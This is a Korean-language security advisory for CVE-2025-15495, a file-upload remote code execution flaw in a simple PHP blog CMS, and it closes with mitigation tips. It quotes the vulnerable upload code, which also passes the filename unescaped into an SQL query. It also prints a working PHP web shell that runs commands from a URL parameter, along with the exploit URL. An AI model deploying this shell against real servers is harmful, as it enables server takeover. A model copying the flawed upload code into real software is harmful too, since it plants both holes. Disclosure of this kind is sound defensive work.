
CVE-2025-15495 - 임의 파일 업로드를 통한 원격 코드 실행 (RCE)
BiggiDroid – 간단한 PHP 블로그 CMS 제품 페이지: https://biggidroid.com/product/simple-php-blog/
치명적
CVSS (추정): 9.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
Simple PHP Blog CMS에는 관리자 패널의 사이트 로고 업로드 기능에 무제한 파일 업로드 취약점이 존재합니다. 인증된 공격자는 이미지로 위장한 악성 PHP 파일을 업로드할 수 있으며, 이 파일은 웹 접근 가능 디렉토리에 저장되어 서버에 의해 실행되어 원격 명령 실행으로 이어집니다.
관리자 패널 → 사이트 로고 업데이트
관련 취약 코드 스니펫:
$target = "../image/".basename($_FILES['image']['name']);
$image = $_FILES['image']['name'];
$query = mysqli_query($con,
"UPDATE sitedetails SET sitelogo='$image' WHERE id='$id'");
if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
// success
}
shell.php라는 파일 생성:
<?php
$cmd = $_GET['cmd'] ?? '';
echo "<pre>";
system($cmd);
echo "</pre>";
?>
shell.php 업로드📌 애플리케이션이 검증 없이 PHP 파일을 수락합니다
업로드 후, 파일은 다음에서 접근 가능합니다:
http://127.0.0.1/image/shell.php
시스템 명령 실행:
http://127.0.0.1/image/shell.php?cmd=dir
서버가 OS 명령을 실행하고 출력을 반환하여 원격 코드 실행을 확인합니다.




이 취약점은 완전한 서버 장악으로 이어질 수 있습니다.
.htaccess / 서버 강화 없음파일 확장자 제한
$allowed = ['jpg','jpeg','png','gif'];
MIME 유형 검증
finfo_file()
업로드된 파일 이름 변경